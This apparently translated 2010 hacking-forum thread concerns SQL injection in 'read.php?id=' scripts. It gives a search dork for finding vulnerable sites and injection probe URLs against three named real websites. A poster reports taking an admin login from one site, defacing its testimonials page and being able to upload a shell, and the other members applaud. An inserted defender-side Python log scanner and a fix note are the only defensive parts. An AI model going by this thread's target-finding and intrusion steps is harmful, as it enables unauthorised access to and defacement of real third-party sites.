[Bug] SQL injection in News Read ID (read.php?)

Forum for discussing everything about web hacking, from footprinting, scanning, gaining access, privilege escalation, exploitation, covering tracks and backdoors through to securing the web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Discusses bugs, penetration, exploitation and techniques for securing websites and web servers. Include a POC here so members can learn from it

Post by poni » Sun May 30, 2010 10:06 pm

Component with the SQL injection bug = read.php
DORK: inurl:"read.php?id="

POC

http://campus.sanook.com/inlove/read.php?id=132'
http://www.inspireyourworld.com/issue6/read.php?id=23'
http://www.wellerpools.com/news-read.php?id=16'
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001

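Added example, not part of the original thread: a defender-side check that flags access-log requests to a `*read.php` script whose `id` parameter is not a plain integer, such as the trailing single quote used in the POC above. The log format, the function name `suspicious_id_requests` and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in a common access-log layout (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [30/May/2010:22:06:11 +0700] "GET /read.php?id=132 HTTP/1.1" 200 5120
203.0.113.9 - - [30/May/2010:22:06:40 +0700] "GET /read.php?id=132' HTTP/1.1" 200 312
203.0.113.9 - - [30/May/2010:22:07:02 +0700] "GET /news-read.php?id=16%27 HTTP/1.1" 500 0
198.51.100.7 - - [30/May/2010:22:09:15 +0700] "GET /index.php?page=2 HTTP/1.1" 200 2048
198.51.100.7 - - [30/May/2010:22:10:30 +0700] "GET /read.php?id= HTTP/1.1" 200 100
"""

# Groups: client, timestamp, method, request target, status code.
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) HTTP/[\d.]+" (\d{3})'
)


def suspicious_id_requests(log_text, script_suffix="read.php", param="id"):
    """Return (client, timestamp, path, decoded value, status) for every
    request to a *read.php script whose id is not a decimal integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, ts, _method, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(script_suffix):
            continue
        # parse_qs percent-decodes values, so %27 is compared as "'".
        values = parse_qs(url.query, keep_blank_values=True).get(param, [])
        for value in values:
            if not re.fullmatch(r"[0-9]+", value):
                hits.append((client, ts, url.path, value, int(status)))
    return hits


if __name__ == "__main__":
    for hit in suspicious_id_requests(SAMPLE_LOG):
        print(hit)
```

A hit only shows that someone probed the parameter; on the application side the fix is to cast `id` to an integer or bind it in a parameterized query.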

Post by poni » Sun May 30, 2010 10:46 pm

http://www.wellerpools.com/news-read.php?id=16'

Got the Admin login + pass :devil
Admin = chr1sty
Password : ************ censored

Post by shad.hckr » Sun May 30, 2010 10:51 pm

Wow... so you're on a raid, huh, mas pon... hehehehe... :ngakak: :ngakak: :ngakak:
but that CMS is pretty cool too... :licik: :licik:

Post by poni » Sun May 30, 2010 10:58 pm

There are gr33tz for you.. check it out

http://www.wellerpools.com/testimonials.php
Btw. every component can be modified. You can even upload a shell.. but I only went as far as editing testimonial.php. :P

Post by poni » Sun May 30, 2010 11:13 pm

shad.hckr wrote:Wow... so you're on a raid, huh, mas pon... hehehehe... :ngakak: :ngakak: :ngakak:
but that CMS is pretty cool too... :licik: :licik:
Yeah.. got nothing to do at the moment, there are still lots of sites vulnerable with that content. Just check the dork

Post by demonbrando » Sun May 30, 2010 11:29 pm

Wow, bro poni, awesome... :devil but sadly the password is censored??? :putusasa:
Take life easy, but don't forget to worship..

Post by shad.hckr » Sun May 30, 2010 11:36 pm

wekekeke..

poni : Miss christy, we don`t do any harm on the system. Just put this message . so you may fix your web soon. thanks

Gr33tz:

   ^Family-Code^, ^rumput_kering^, 0x99/JerryMaheswara, Paman, XShadow, psychopath, fl3xu5, gblack, mas_agung, Jundi, ^_xfree_^, systemofadown, yadoy666, Phychole, Wilmar_Kidz, 3xtr3m3b0y, Darkzzzz, Shad.hckr,  And You... the marvellous XCoders those change the Indonesian Underground scenes

Http://forum.xcode.or.id
Cool, mas.. =))

Xcode is no less than Agnes Monica, who went international.. :ngakak: :ngakak:

Post by anjay » Sun May 30, 2010 11:37 pm

Awesome, om poni :love:
Above the sky there is still more sky
Be like the rice plant: the fuller it gets, the lower it bows

Post by shinichi81 » Mon May 31, 2010 10:16 am

Please upload the POC, boss poni... :tapa: :tapa: :tapa: :tapa:
............make a wish............

Post by peniru » Mon May 31, 2010 10:20 am

Whoa.. more study material.... :love: :love:

Thanks, kk poni..... :devil :devil
.::. My Sign .::.
..noobie Pool..
Whether you use tools or not doesn't matter; what matters is understanding what you are doing
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
